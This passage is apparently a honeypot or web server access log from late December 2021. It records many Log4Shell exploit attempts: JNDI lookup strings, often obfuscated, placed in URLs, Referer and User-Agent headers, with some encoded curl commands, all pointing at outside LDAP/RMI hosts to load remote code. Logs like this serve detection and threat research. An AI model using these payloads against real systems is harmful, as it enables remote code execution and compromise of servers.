    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F51.79.74.227%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://51.79.74.227:1389/Binary}

2021-12-24 80.163.26.100
    URL: GET /
    Referer: ${${::-j}ndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://51.79.74.227:1389/Binary}

2021-12-24 80.163.26.100
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F51.79.74.227%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://51.79.74.227:1389/Binary}

2021-12-24 80.163.26.100
    URL: GET /
    Referer: ${${::-j}ndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://51.79.74.227:1389/Binary}

2021-12-24 159.89.161.111
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34.169%3A1389%2F%23
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 62.171.179.132
    URL: GET /
    Referer: ${${::-j}ndi:rmi://51.79.74.227:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://51.79.74.227:1389/#Binary}

2021-12-23 62.171.179.132
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F51.79.74.227%3A1389%2F%23Binary%7D
    Referer: ${${::-j}ndi:rmi://51.79.74.227:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://51.79.74.227:1389/#Binary}

2021-12-23 62.171.179.132
    URL: GET /
    Referer: ${${::-j}ndi:rmi://51.79.74.227:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://51.79.74.227:1389/#Binary}

2021-12-23 62.171.179.132
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 62.171.179.132
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 62.171.179.132
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 62.171.179.132
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 173.249.2.236
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${jndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 173.249.2.236
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${jndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 173.249.2.236
    URL: GET /
    Referer: ${jndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${jndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 173.249.2.236
    URL: GET /
    Referer: ${jndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${jndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 173.249.2.236
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 173.249.2.236
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 173.249.2.236
    URL: GET /
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 173.249.2.236
    URL: GET /
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 200.98.204.95
    URL: GET /solr?q=%24%7Bjndi%3Aldap%3A%2F%2F51.79.74.227%3A1389%2F%23Binary%7D
    Referer: ${jndi:ldap://51.79.74.227:1389/#Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/#Binary}

2021-12-23 200.98.204.95
    URL: GET /solr?q=%24%7Bjndi%3Aldap%3A%2F%2F51.79.74.227%3A1389%2F%23Binary%7D
    Referer: ${jndi:ldap://51.79.74.227:1389/#Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/#Binary}

2021-12-23 200.98.204.95
    URL: GET /solr
    Referer: ${jndi:ldap://51.79.74.227:1389/#Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/#Binary}

2021-12-23 200.98.204.95
    URL: GET /solr
    Referer: ${jndi:ldap://51.79.74.227:1389/#Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/#Binary}

2021-12-23 200.98.204.95
    URL: GET /solr?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 200.98.204.95
    URL: GET /solr?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 200.98.204.95
    URL: GET /solr
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 200.98.204.95
    URL: GET /solr
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 51.195.192.126
    URL: GET /
    Referer: -
    User Agent: ${jndi:ldap://sshd-honeypot7.rr.sabrajndi.site}

2021-12-23 178.32.178.64
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F51.79.74.227%3A1389%2F%23Binary%7D
    Referer: ${jndi:ldap://51.79.74.227:1389/#Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/#Binary}

2021-12-23 178.32.178.64
    URL: GET /
    Referer: ${jndi:ldap://51.79.74.227:1389/#Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/#Binary}

2021-12-23 178.32.178.64
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://144.202.34.169:1389/Binary}
    User Agent: ${jndi:ldap://144.202.34.169:1389/Binary}

2021-12-23 178.32.178.64
    URL: GET /
    Referer: ${jndi:ldap://144.202.34.169:1389/Binary}
    User Agent: ${jndi:ldap://144.202.34.169:1389/Binary}

2021-12-23 144.91.78.55
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${jndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 144.91.78.55
    URL: GET /
    Referer: ${jndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${jndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 144.91.78.55
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Blower%3An%7D%24%7Blower%3Ad%7Di%3A%24%7Blower%3Armi%7D%3
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://144.202.34.169:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://144.202.34.169:1389/Binary}

2021-12-23 144.91.78.55
    URL: GET /
    Referer: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://144.202.34.169:1389/Binary}
    User Agent: ${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://144.202.34.169:1389/Binary}

2021-12-23 78.46.254.74
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F51.79.74.227%3A1389%2F%23Binary%7D
    Referer: ${jndi:rmi://51.79.74.227:1389/#Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/#Binary}

2021-12-23 78.46.254.74
    URL: GET /
    Referer: ${jndi:rmi://51.79.74.227:1389/#Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/#Binary}

2021-12-23 78.46.254.74
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Bupper%3An%7D%24%7Blower%3Ad%7D%24%7Bupper%3Ai%7D%3A%24%7
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://144.202.34.169:1389/#Binary}

2021-12-23 78.46.254.74
    URL: GET /
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://144.202.34.169:1389/#Binary}

2021-12-23 188.166.100.53
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F51.79.74.2
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-23 188.166.100.53
    URL: GET /
    Referer: ${jndi:rmi://51.79.74.227:1389/#Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/#Binary}

2021-12-23 188.166.100.53
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-23 188.166.100.53
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F51.79.74.227%3A1389%2F%23Binary%7D
    Referer: ${jndi:rmi://51.79.74.227:1389/#Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F51.79.74.227%3A1389%2F%23Bi
    Referer: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F51.79.74.227%3A1389%2F%23Bi
    Referer: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F51.79.74.227%3A1389%2F%23Bi
    Referer: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F51.79.74.227%3A1389%2F%23Bi
    Referer: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 103.119.139.27
    URL: GET /
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 210.18.138.230
    URL: HEAD /
    Referer: ${jndi:ldap://172.105.34.103:1389/a}
    User Agent: ${jndi:ldap://172.105.34.103:1389/a}

2021-12-23 210.18.138.230
    URL: HEAD /
    Referer: ${jndi:ldap://172.105.34.103:1389/a}
    User Agent: ${jndi:ldap://172.105.34.103:1389/a}

2021-12-23 176.31.163.17
    URL: GET /?q=%24%7B%24%7Blower%3Aj%7D%24%7Bupper%3An%7D%24%7Blower%3Ad%7D%24%7Bupper%3Ai%7D%3A%24%7
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/Binary}

2021-12-23 176.31.163.17
    URL: GET /
    Referer: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/Binary}
    User Agent: ${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://51.79.74.227:1389/Binary}

2021-12-23 176.31.163.17
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/#Binary}

2021-12-23 176.31.163.17
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/#Binary}

2021-12-23 210.18.138.230
    URL: HEAD /
    Referer: ${jndi:ldap://172.105.34.103:1389/a}
    User Agent: ${jndi:ldap://172.105.34.103:1389/a}

2021-12-23 210.18.138.230
    URL: HEAD /
    Referer: ${jndi:ldap://172.105.34.103:1389/a}
    User Agent: ${jndi:ldap://172.105.34.103:1389/a}

2021-12-23 182.160.29.167
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 182.160.29.167
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 182.160.29.167
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34.169%3A1389%2F%23
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 182.160.29.167
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34.169%3A1389%2F%23
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 182.160.29.167
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 182.160.29.167
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/#Binary}

2021-12-23 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-23 195.54.160.149
    URL: GET /?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU0LjE2MC4xND
    Referer: http://sshd-honeypot4/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-23 195.54.160.149
    URL: GET /
    Referer: http://sshd-honeypot4
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-23 45.55.63.166
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 45.55.63.166
    URL: GET /
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 45.55.63.166
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F51.79.74.227%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/Binary}

2021-12-23 45.55.63.166
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 45.55.63.166
    URL: GET /
    Referer: ${jndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/Binary}

2021-12-23 45.55.63.166
    URL: GET /
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 45.55.63.166
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F51.79.74.227%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/Binary}

2021-12-23 45.55.63.166
    URL: GET /
    Referer: ${jndi:rmi://51.79.74.227:1389/Binary}
    User Agent: ${jndi:rmi://51.79.74.227:1389/Binary}

2021-12-23 45.226.53.34
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/Binary}

2021-12-23 45.226.53.34
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/Binary}

2021-12-23 45.226.53.34
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/Binary}

2021-12-23 45.226.53.34
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://144.202.34.169:1389/Binary}

2021-12-23 45.226.53.34
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F51.79.74.2
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-23 45.226.53.34
    URL: GET /?q=%24%7B%24%7Blower%3A%24%7Blower%3Ajndi%7D%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F51.79.74.2
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-23 45.226.53.34
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-23 45.226.53.34
    URL: GET /
    Referer: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}
    User Agent: ${${lower:${lower:jndi}}:${lower:rmi}://51.79.74.227:1389/#Binary}

2021-12-23 195.54.160.149
    URL: GET /
    Referer: https://x.y.168.9:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-23 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.9:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1LjU
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-23 195.54.160.149
    URL: GET /
    Referer: https://x.y.169.10:443/?x=${jndi:ldap://195.54.160.149:12344/Basic/Command/Base64/KGN1cmwgLXMgMTk1Lj
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::-p}://195.54.160.149:12344/Basic/Command/Bas

2021-12-23 185.8.212.130
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2F%23Binary%7D
    Referer: ${jndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${jndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 185.8.212.130
    URL: GET /
    Referer: ${jndi:rmi://144.202.34.169:1389/#Binary}
    User Agent: ${jndi:rmi://144.202.34.169:1389/#Binary}

2021-12-23 185.8.212.130
    URL: GET /?q=%24%7B%24%7Blower%3Ajndi%7D%3A%24%7Blower%3Armi%7D%3A%2F%2F144.202.34.169%3A1389%2FBin
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/Binary}

2021-12-23 185.8.212.130
    URL: GET /
    Referer: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/Binary}
    User Agent: ${${lower:jndi}:${lower:rmi}://144.202.34.169:1389/Binary}

2021-12-23 103.85.95.5
    URL: GET /?q=%24%7Bjndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D
    Referer: ${jndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${jndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 103.85.95.5
    URL: GET /
    Referer: ${jndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${jndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 103.85.95.5
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7D%24%7B%3A%3A-n%7D%24%7B%3A%3A-d%7D%24%7B%3A%3A-i%7D%3A%24%7B%3A
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}

2021-12-23 103.85.95.5
    URL: GET /
    Referer: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://144.202.34.169:1389/Binary}

2021-12-23 103.119.139.27
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F51.79.74.227%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://51.79.74.227:1389/Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/Binary}

2021-12-23 103.119.139.27
    URL: GET /
    Referer: ${jndi:ldap://51.79.74.227:1389/Binary}
    User Agent: ${jndi:ldap://51.79.74.227:1389/Binary}

2021-12-23 103.119.139.27
    URL: GET /?q=%24%7B%24%7B%3A%3A-j%7Dndi%3Armi%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 103.119.139.27
    URL: GET /
    Referer: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}
    User Agent: ${${::-j}ndi:rmi://144.202.34.169:1389/Binary}

2021-12-23 134.122.66.193
    URL: GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F144.202.34.169%3A1389%2FBinary%7D
    Referer: ${jndi:ldap://144.202.34.169:1389/Binary}
    User Agent: ${jndi:ldap://144.202.34.169:1389/Binary}

2021-12-23 134.122.66.193
    URL: GET /
    Referer: ${jndi:ldap://144.202.34.169:1389/Binary}
    User Agent: ${jndi:ldap://144.202.34.169:1389/Binary}

2021-12-23 134.122.66.193
